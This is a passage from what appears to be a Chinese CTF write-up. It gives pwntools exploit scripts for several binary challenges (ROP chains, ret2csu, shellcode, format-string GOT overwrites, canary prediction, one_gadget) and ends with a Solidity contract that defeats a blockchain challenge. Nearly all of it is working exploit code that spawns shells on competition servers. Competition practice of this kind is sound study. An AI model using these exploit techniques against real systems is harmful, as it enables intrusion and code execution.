    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x40137D') #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

ret = 0x40101a
rdi = 0x401333
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['vuln']
csu_pop = 0x40132A  #rbx,rbp,r12,r13,r14,r15
csu_mov = 0x401310

payload = b'\x00' + b'a' * 0x17 + p64(csu_pop) + p64(0) + p64(1) + p64(1) + p64(write_got) + p64(8) + p64(write_got) + p64(csu_mov) + b'a' * 56 + p64(main)

io.sendlineafter('backdoor!',payload)

write_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

base = write_addr - libc.sym['write']
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))

payload1 = b'\x00' + b'a' * 0x17 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
io.sendlineafter('backdoor!',payload1)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

ezpwn

重置read,使read函数可以读取更长shellcode

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 0
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/chal')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32892)

elfnum = 0
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/chal')

chooselibc = 0
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x401290') #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

shellcode = asm('''
xor rax,rax
mov dx,0x100
syscall
''')
payload = b'/bin/sh\x00' + shellcode
io.send(payload)
payload1 = b'a' * 9 + asm(shellcraft.sh())
io.send(payload1)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

write2

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/chal')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('pwn.node.game.sycsec.com',31130)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/chal')

chooselibc = 0
pwnlibc = 1
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io , 'b 0x')                      #断点调试
#gdb.attach(io , 'b *$rebase(0x12FB)')            #PIE调试
#gdb.attach(io)                                 #程序调试
#----------------------------------------------------------

io.recvuntil(b':')
v1 = int(io.recv(14),16)
v2 = v1 + 0x44 - 0x08
sh = v1 + 4

shellcode = asm('''
push rdx;
pop rsi;
mov ax,0x3b;
add rdi,0x580;
syscall
nop
nop
nop
nop 
''')

io.sendline(shellcode)

for i in range(6):
    io.sendline(str(32 + i))
    io.sendline(str(hex((v2 >> (8 * i)) & 0xff)))

binsh =  0x68732f2f6e69622f

for i in range(8):
    io.sendline(str(48 + i))
    io.sendline(str(hex((binsh >> (8 * i)) & 0xff)))

io.sendline(str(48 + 8))
io.sendline(str(hex(0)))

for i in range(6):
    io.sendline(str(64 + i))
    io.sendline(str(hex((sh >> (8 * i)) & 0xff)))

io.sendline(b'-1')

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

fmt1.0

格式化字符串利用

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/fmt1.0')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('pwn.node.game.sycsec.com',31631)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/fmt1.0')

chooselibc = 0
pwnlibc = 0
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x4012AD') #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

ret = 0x40101a
rdi = 0x401353
main = elf.sym['vuln']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
execve_plt = elf.plt['execve']
execve_got = elf.got['execve']

payload=fmtstr_payload(6,{printf_got:execve_plt}).ljust(0x58,b'a') + p64(main)
io.sendafter(b'\n',payload)
io.sendline(b'/bin/sh\x00')

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

write_canary

伪随机计算canary

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

#context(os='linux', arch='amd64', log_level='debug')
context(arch = 'amd64')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/chal')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('pwn.node.game.sycsec.com',31130)

# elfnum = 1
# if(elfnum == 0):  #日常练习
#   elf = ELF('./pwn')
# else:             #比赛方便更换
#   elf = ELF('/home/yu/CTF/PWN/chal')

chooselibc = 0
pwnlibc = 0
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x4012AD') #断点调试/PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

buf0 = 0x04040E0
buf1 = 0x04040E0 + 0x800

my_libc = cdll.LoadLibrary('/home/yu/CTF/PWN/libc.so.6')
my_libc.srand(my_libc.time(0) % 60)
v2 = my_libc.rand()
v3 = my_libc.rand()
canary = (((v2 >> 4) ^ (16 * v3 + (v3 >> 8) * (v2 << 8))) >> 32) 
canary += ((((v2 >> 48) + (v2 << 16) * (v3 >> 16)) ^ (v3 << 48)) << 32)
canary = canary & 0xffffffffffffffff
print(hex(canary))
shellcode = asm(shellcraft.open('flag') + shellcraft.read(3,buf1,0x100) + shellcraft.write(1,buf1,0x100))
io.sendline(shellcode)

payload = b'a' * 0x08 + p64(canary) + p64(0) + p64(buf0)
io.sendline(payload)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

ez_fullprotection

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/ez_fullprotection')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',30555)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/ez_fullprotection')

chooselibc = 0
pwnlibc = 0
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b main')          #断点调试
#gdb.attach(io,'b *$rebase(0x128B)')  #PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

io.sendlineafter('name: ',b'dijia')
io.sendlineafter('guess :',b'a')
io.recvuntil(b'entered ')
pie_base = int(io.recvuntil(b'.',drop = True),10) - elf.sym['_start']
print(hex(pie_base))

rdi = pie_base + 0x016e3
rsi_r15 = pie_base + 0x016e1
ret = pie_base + 0x0101a
put_plt = pie_base + elf.plt['puts']
put_got = pie_base + elf.got['puts']
main = pie_base + 0x1541

pl1 = b'a' * 0x38 + p64(rdi) + p64(put_got) + p64(put_plt) + p64(main)
pl1 = pl1.ljust(0x18a8,b'a')
io.sendline(pl1)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

base = puts_addr - libc.sym['puts']
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))
rdx = base + 0x142c92
syscall = base + 0x2284d
rax = base + 0x036174

pl2 = b'a' * 0x38 + p64(rdi) + p64(binsh) + p64(rsi_r15) + p64(0) * 2 + p64(rdx) + p64(0) + p64(rax) + p64(0x3b) + p64(syscall)
pl2 = pl2.ljust(0x18a8,b'a')
sleep(0.5)
io.sendline(pl2)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

why_n0t_puts

利用magicgadget
ROPgadget --binary why_n0t_puts | grep ret | grep "\[rbp"
file

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/why_n0t_puts')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',30511)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/why_n0t_puts')

chooselibc = 0
pwnlibc = 0
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b main')          #断点调试
#gdb.attach(io,'b *$rebase(0x128B)')  #PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

read_plt = elf.plt['read']
read_got = elf.got['read']
rdi = 0x4011d3
rsi = 0x4011d1
magic= 0x40111c # add dword ptr [rbp - 0x3d], ebx ; nop ; ret
bss  = 0x404000

csu1 = 0x4011CA
csu2 = 0x4011B0
leave_ret = 0x401162

call_read = 0x401158
pl1  = 0x38 * b'\x00'
pl1 += p64(csu1)
pl1 += p64(0)
pl1 += p64(1)
pl1 += p64(0)
pl1 += p64(bss+0x200)
pl1 += p64(0x200)
pl1 += p64(read_got)
pl1 += p64(csu2)
pl1 += p64(0x41)
pl1 += p64(bss+0x200-8) * 6
pl1 += p64(leave_ret)
io.sendline(pl1)

libc = elf.libc
mprotect = libc.sym['mprotect']
read_offset = libc.sym['read']
offset = (mprotect - read_offset)

target = elf.got['read']

pl2  = p64(csu1)
pl2 += p64(offset) + p64(target+0x3d) + p64(0) * 4
pl2 += p64(magic)

pl2 += p64(csu1)
pl2 += p64(0)
pl2 += p64(1)
pl2 += p64(bss)
pl2 += p64(0x1000)
pl2 += p64(0x7)
pl2 += p64(target)
pl2 += p64(csu2)
pl2 += p64(0x42) * 7
pl2 += p64(bss + 0x200 + len(pl2)+8)
pl2 += b'\x90' * 0x10
pl2 += asm(shellcraft.sh())

io.sendline(pl2)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

EVA

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/EVA')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',31374)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/EVA')

chooselibc = 0
pwnlibc = 0
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b main')          #断点调试
#gdb.attach(io,'b *$rebase(0x128B)')  #PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

stack = 0x404b00
main = 0x40128A
rdi = 0x401423
ret = 0x40101a
rbp = 0x4011dd
put_plt = elf.plt['puts']
put_got = elf.got['puts']

io.sendlineafter("Evangelion>",str(2))
pl1 = p64(stack) + p64(main)
io.sendafter("watch\n",pl1)

io.sendlineafter("Evangelion>",str(2))
pl2 = p64(0x404af8 + 0x41) + p64(0x04012F3)
io.sendafter("watch\n",pl2)

canary = u64(io.recv(8)) & int(('ff' * 7),16)
canary = canary << 8

io.sendline(str(1))
pl3 = b'a' * 0x1f + p64(rdi) + p64(put_got) + p64(put_plt) + p64(rbp) + p64(stack) + p64(0x0401355)
io.sendafter("like-minded!",pl3)
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

base = puts_addr - libc.sym['puts']
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))

pl4 = b'a' * 0x48 + p64(canary) + p64(0) + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
io.send(pl4)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

fmt2.0

利用one_gadget

from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time

context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0):     #本地练习
    io = process('./pwn')
elif(local == 1):   #比赛本地方便替换
    io = process('/home/yu/CTF/PWN/fmt2.0')
elif(local == 2):   #NSSCTF
    io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3):   #BUUCTF
    io = remote('node4.buuoj.cn',28067)
else:               #比赛远程
    io = remote('112.6.51.212',32892)

elfnum = 1
if(elfnum == 0):    #日常练习
    elf = ELF('./pwn')
else:               #比赛方便更换
    elf = ELF('/home/yu/CTF/PWN/fmt2.0')

chooselibc = 0
pwnlibc = 0
match chooselibc:
    case 0:     
        if(pwnlibc == 0):       #其他版本
            libc = ELF('/home/yu/CTF/PWN/libc.so.6')
        else:                   #本地
            libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    case 1:     #16.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
    case 2:     #18.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
    case 3:     #19.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
    case 4:     #20.04
        if(pwnlibc == 0):
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
        else:
            libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')

def debug():
    gdb.attach(io)
    pause()

#----------------------------------------------------------
#调试
#gdb.attach(io,'b main')          #断点调试
#gdb.attach(io,'b *$rebase(0x128B)')  #PIE调试
#gdb.attach(io)                         #程序调试
#----------------------------------------------------------

io.recvuntil(':')
io.send(b'%p-%19$p')

rsp = int(io.recv(14),16) - 0x8
io.recvuntil('-')

libc_base = int(io.recv(14),16) - 0xf3 - libc.sym['__libc_start_main']

one_gadget = libc_base + 0xe3b01
ret = rsp + 0x70
system_low = one_gadget & 0xffff
system_high = (one_gadget >> 16) & 0xffff

payload  = b'%' + str(system_low).encode() + b'c%10$hn'
payload += b'%' + str(system_high - system_low).encode() + b'c%11$hn'
payload = payload.ljust(0x20,b'b')
payload += p64(ret) + p64(ret + 2)
io.sendafter('second str:',payload)

#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()

Blockchain

SimpleConnect

公共地址区块链,直接把出题人的交易记录
file

give_me_Goerlieth

同上

stage

输入source获取源码

pragma solidity ^0.8.4;

interface IReceiver {
    function getNumber() external view returns(uint256);
}
contract stageGame{
    mapping (address => bool) private flag;
    mapping (address => bool) public isStage1Completed;

    function stage1() external {
        uint size;
        address addr = msg.sender;
        assembly { size := extcodesize(addr) }
        require(size == 0,"EOA must!");
        isStage1Completed[msg.sender] = true;
    }

    function stage2(uint _guess) external {
        require(isStage1Completed[msg.sender],"You should complete stage1 first!");
        uint number = block.timestamp % 100 + 1;
        require(number == _guess, "Wrong number!");
        _stage3();
    }

    function _stage3() private {
        uint size;
        address addr = msg.sender;
        assembly { size := extcodesize(addr) }
        require(size > 0,"Contract must!");
        uint256 number1;
        uint256 number2;
        (bool success,bytes memory data1) = addr.staticcall(abi.encodeWithSignature("getNumber()"));
        require(success,"First call failed!");
        number1 = abi.decode(data1, (uint256));

        (bool success2,bytes memory data2) = addr.call(abi.encodeWithSignature("getNumber()"));
        require(success2,"Second call failed!");
        number2 = abi.decode(data2, (uint256));
        require(number1 != number2, "Must return different Number!");

        flag[tx.origin] = true;
    }

    function check(address addr) external view returns(bool){
        return flag[addr];
    }

}

简单的分析一下,stage1在判断代码量是否为0,stage2需要传入值,对我们传入的值进行判断,相同则进行stage3,stage3则要求静态调用获取的值number1与正常调用获取的值number2不同,则输出
这里我们需要自己构造hack函数,stage1可以通过contract函数来进行绕过,stage2可以直接传入block.timestamp % 100 + 1,stage3就根据https://ranwen.de/posts/2023-09-17-metatrust23/

contract exp{
    stageGame public StageGame;
    constructor(address _Address) {
        StageGame = stageGame(_Address);
        StageGame.stage1();      
        }
    function getNumber() external  view  returns (uint256) {
        uint gbef=0;
        uint gaft=0;
        assembly
        {
            gbef:=gas()
            let x:=sload(0x66666)
            gaft:=gas()
        }
        uint gasc=gbef-gaft;
        if(gasc>2000)
        return uint256(0);
        return uint256(1);
        }
    function hack(address addr) public  returns(bool){
            bool flag=false;
            uint256 number=block.timestamp % 100 + 1;
            StageGame.stage2(number);
            flag=StageGame.check(addr);
            return flag;
    }
}